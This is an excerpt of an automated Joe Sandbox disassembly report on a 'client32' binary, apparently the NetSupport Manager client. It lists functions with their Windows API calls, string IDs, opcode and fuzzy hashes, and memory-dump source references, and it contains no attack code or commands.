                                                                                                                        • API String ID: 2405090531-3988092936
                                                                                                                        • Opcode ID: 84840fa68ed9dbc4bd2914ebd92bcef87d2fe5d36eb5bde29d66e859ae3eb828
                                                                                                                        • Instruction ID: 94a70ffcd2985c1c4c6c24ffa661c7eca0a0884173c8121f0f48620d836b4cdf
                                                                                                                        • Opcode Fuzzy Hash: 84840fa68ed9dbc4bd2914ebd92bcef87d2fe5d36eb5bde29d66e859ae3eb828
                                                                                                                        • Instruction Fuzzy Hash: 8CF02BB6D40118B7C710AAA8AC05EEFB7BC9FD6644F800099FF04A7141E634AE05C7D9
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 685AABDA
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                        • String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                        • API String ID: 501242067-2615622132
                                                                                                                        • Opcode ID: f99083760092ffc4e6a413559e9090024aa4e503b87bcb0307a28c5f5d6cca45
                                                                                                                        • Instruction ID: e0416cbc78300c481d3472d48c3da09239ca3b33e8aa5f7af95c181342031d2d
                                                                                                                        • Opcode Fuzzy Hash: f99083760092ffc4e6a413559e9090024aa4e503b87bcb0307a28c5f5d6cca45
                                                                                                                        • Instruction Fuzzy Hash: B1F0BEB26403009FD720DF4CDC51B2AB7D8DF59704F808429EA9CA7385E371BC448BAA
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,?,?,?,00000000), ref: 685ADA6A
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000), ref: 685ADA97
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 685ADAA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleObjectSingleThreadWait
                                                                                                                        • String ID: Refcount.cpp$hThread
                                                                                                                        • API String ID: 51348343-1332212576
                                                                                                                        • Opcode ID: 967a51451ece59dda9a0d9c9808888f7cde3726fe62ecc27943a71810387db1a
                                                                                                                        • Instruction ID: 5a9711dcfcb0a50a41a53ff00934578ee2b9360e4e95e78665a00281a68c3042
                                                                                                                        • Opcode Fuzzy Hash: 967a51451ece59dda9a0d9c9808888f7cde3726fe62ecc27943a71810387db1a
                                                                                                                        • Instruction Fuzzy Hash: E5F0A776348301AFDB109B949C99F5F7BA9DB81362F004219FE55922C1D920D4098765
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(cenctrl.dll), ref: 110852BE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,cenctrl_protection), ref: 110852D0
                                                                                                                          • Part of subcall function 11085260: FreeLibrary.KERNEL32(00000000,?,110852E4), ref: 1108526A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                        • String ID: EDC$cenctrl.dll$cenctrl_protection
                                                                                                                        • API String ID: 145871493-3137230561
                                                                                                                        • Opcode ID: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                        • Instruction ID: d397d68d13e32483cc8c89d25abb01868daaac96927e0e05309bf2cb32c419b9
                                                                                                                        • Opcode Fuzzy Hash: bcefdbb54fd6e3826cd2e4b083ee9c304654a3391fecb8a6baff1735307a3122
                                                                                                                        • Instruction Fuzzy Hash: 42F02278E0832367EB01AF38BC0978E7AC85B0231CF410437F845EA20AFD22E04047A3
                                                                                                                        APIs
                                                                                                                        • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017058
                                                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 11017067
                                                                                                                        • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017088
                                                                                                                        • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101709B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageWindow$FindLongPostSend
                                                                                                                        • String ID: IPTip_Main_Window
                                                                                                                        • API String ID: 3445528842-293399287
                                                                                                                        • Opcode ID: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                        • Instruction ID: 6ed72df936b24ea30651ffc38d8a948eea9e1772f025cae554d715837251261a
                                                                                                                        • Opcode Fuzzy Hash: f29157ae41647e7040a7eda695b4ceafee474d21207e05018a777220eed7e0bc
                                                                                                                        • Instruction Fuzzy Hash: 06E08638B81B36B6F33357144C8AFDE79549F05B65F108150F722BE1CDC7689440579A
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4048096073-0
                                                                                                                        • Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                                        • Instruction ID: 21e50702d3ba13d8cec39f2119d448ec195d598f35b8a1642b1a823c865275f9
                                                                                                                        • Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                                        • Instruction Fuzzy Hash: 3051D634A00709EBDB24CFA9C86469EB7B1EFA0364F608629E834972D0D771DA51CF91
                                                                                                                        APIs
                                                                                                                        • __time64.LIBCMT ref: 11061086
                                                                                                                          • Part of subcall function 11160477: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,1101D218,00000000,7E4636A2,?,?,?,?,?,1117AD21,000000FF), ref: 11160482
                                                                                                                          • Part of subcall function 11160477: __aulldiv.LIBCMT ref: 111604A2
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061118
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 11061122
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061143
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 11061151
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__time64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3203075409-0
                                                                                                                        • Opcode ID: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
                                                                                                                        • Instruction ID: 9fbe0da520f53b699568b749b3a3eae29a5fc02c94d56d28377b82a7ad20d906
                                                                                                                        • Opcode Fuzzy Hash: 7e686957ebab2d91ef43d1a78624d3982f8265b352f3fa907e3863f3d2a41bed
                                                                                                                        • Instruction Fuzzy Hash: A4315A75D1021DAACF04DFE4D841AEEF7B8EF88714F04856AE805B7280EA756A04CBA5
                                                                                                                        APIs
                                                                                                                        • __strdup.LIBCMT ref: 685AAC64
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 685AACA1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 685AACB7
                                                                                                                        • _malloc.LIBCMT ref: 685AACC6
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 685AACE0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2291067320-0
                                                                                                                        • Opcode ID: 250e9753a922f86b7f442a628e0a007eee47575bd1111bd0cc7010b5d353e232
                                                                                                                        • Instruction ID: f98865119836ece46800ef7f88c0f787105cb03b73522550ea0b8fd267f73640
                                                                                                                        • Opcode Fuzzy Hash: 250e9753a922f86b7f442a628e0a007eee47575bd1111bd0cc7010b5d353e232
                                                                                                                        • Instruction Fuzzy Hash: 6B31E070A00309FFE7118F64CC59FABBBB8EF46754F108055FD45AB280D670A904CB94
                                                                                                                        APIs
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110250F7
                                                                                                                        • GetDlgItem.USER32(?,00001399), ref: 11025131
                                                                                                                        • TranslateMessage.USER32(?), ref: 1102514A
                                                                                                                        • DispatchMessageA.USER32(?), ref: 11025154
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchItemTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1381171329-0
                                                                                                                        • Opcode ID: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                        • Instruction ID: 4970fc911a0e855f64a3d9e647d9240b716c91892a3758399f36bf61488b9f97
                                                                                                                        • Opcode Fuzzy Hash: 9bbe141cbcae0986ab8e1a5d19c673565b62793078cbe47edbac0050ed91c493
                                                                                                                        • Instruction Fuzzy Hash: 6421AE71E0030B6BEB21DA65CC85FAFB3FCAB44708F904469EA1792180FB75E401CB95
                                                                                                                        APIs
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023387
                                                                                                                        • GetDlgItem.USER32(?,00001399), ref: 110233C1
                                                                                                                        • TranslateMessage.USER32(?), ref: 110233DA
                                                                                                                        • DispatchMessageA.USER32(?), ref: 110233E4
                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11023426
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DispatchItemTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1381171329-0
                                                                                                                        • Opcode ID: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                        • Instruction ID: 550a142869b4f1c1193fc2f7bd4fc6518863fc800a3782c30ff24b2ab7768c02
                                                                                                                        • Opcode Fuzzy Hash: 1eedb8004f846199553b9819b36fcc4fba7ec9623a11643e01901e57e73e0ceb
                                                                                                                        • Instruction Fuzzy Hash: 0721A175E0430B6BD711DF65CC85BAFB3ACAB48308F808469EA5296280FF74F501CB91
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 685B4A05
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • _free.LIBCMT ref: 685B4A18
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: f5154de64339ac896a82b26d85caa06d307a92b11fe9aca1339da276fc03e03c
                                                                                                                        • Instruction ID: c4a24ec6d1c87f550e835a274efdc14aef1a7f38bcc6c86a2fde1e3775052987
                                                                                                                        • Opcode Fuzzy Hash: f5154de64339ac896a82b26d85caa06d307a92b11fe9aca1339da276fc03e03c
                                                                                                                        • Instruction Fuzzy Hash: 58110D36444715EFCF315FB9A83469D3796FFF53A4B914425EA6896140EB308D40875C
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                        • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                        • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
